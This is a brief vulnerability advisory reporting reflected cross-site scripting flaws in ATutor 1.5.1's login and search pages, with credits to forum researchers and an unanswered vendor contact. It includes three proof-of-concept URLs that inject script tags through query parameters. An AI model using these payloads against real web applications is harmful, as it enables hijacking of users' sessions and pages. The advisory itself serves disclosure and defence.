ATutor 1.5.1 and prior multiple XSS Vulnerabilities
ATutor 1.5.1 and prior multiple XSS Vulnerabilities
SEVERITY:
=========
Medium
SOFTWARE:
=========
ATutor 1.5.1
http://www.atutor.ca/
INFO:
=====
ATutor 1.5.1 is a web based education portal.
DESCRIPTION:
============
The system is vulnerable to various XSS attacks:
--==XSS==--
Some examples -
http://localhost/tour/login.php?course=";><script>alert('Matrix_Killer
r0X');</script>
http://localhost/tour/search.php?search=1&search=1&words=";><script>alert('There
is no other place like
127.0.0.1');</script>&include=all&find_in=all&display_as=pages
http://localhost/tour/search.php?search=1&words=";><script>alert('Found By
matrix_killer');</script>&include=all&find_in=all&display_as=pages&submit=Search
VENDOR STATUS:
==============
Vendor was contacted but no response received till date.
CREDITS:
========
This vulnerability was discovered and researched by
matrix_killer of h4cky0u Security Forums.
mail : matrix_k at abv.bg
web : http://www.h4cky0u.org
Co-Researcher:
h4cky0u of h4cky0u Security Forums.
mail : h4cky0u at gmail.com
web : http://www.h4cky0u.org
Greets to all omega-team members + krassswr,EcLiPsE and all who support us !!!
ORIGINAL:
=========
http://h4cky0u.org/viewtopic.php?t=2094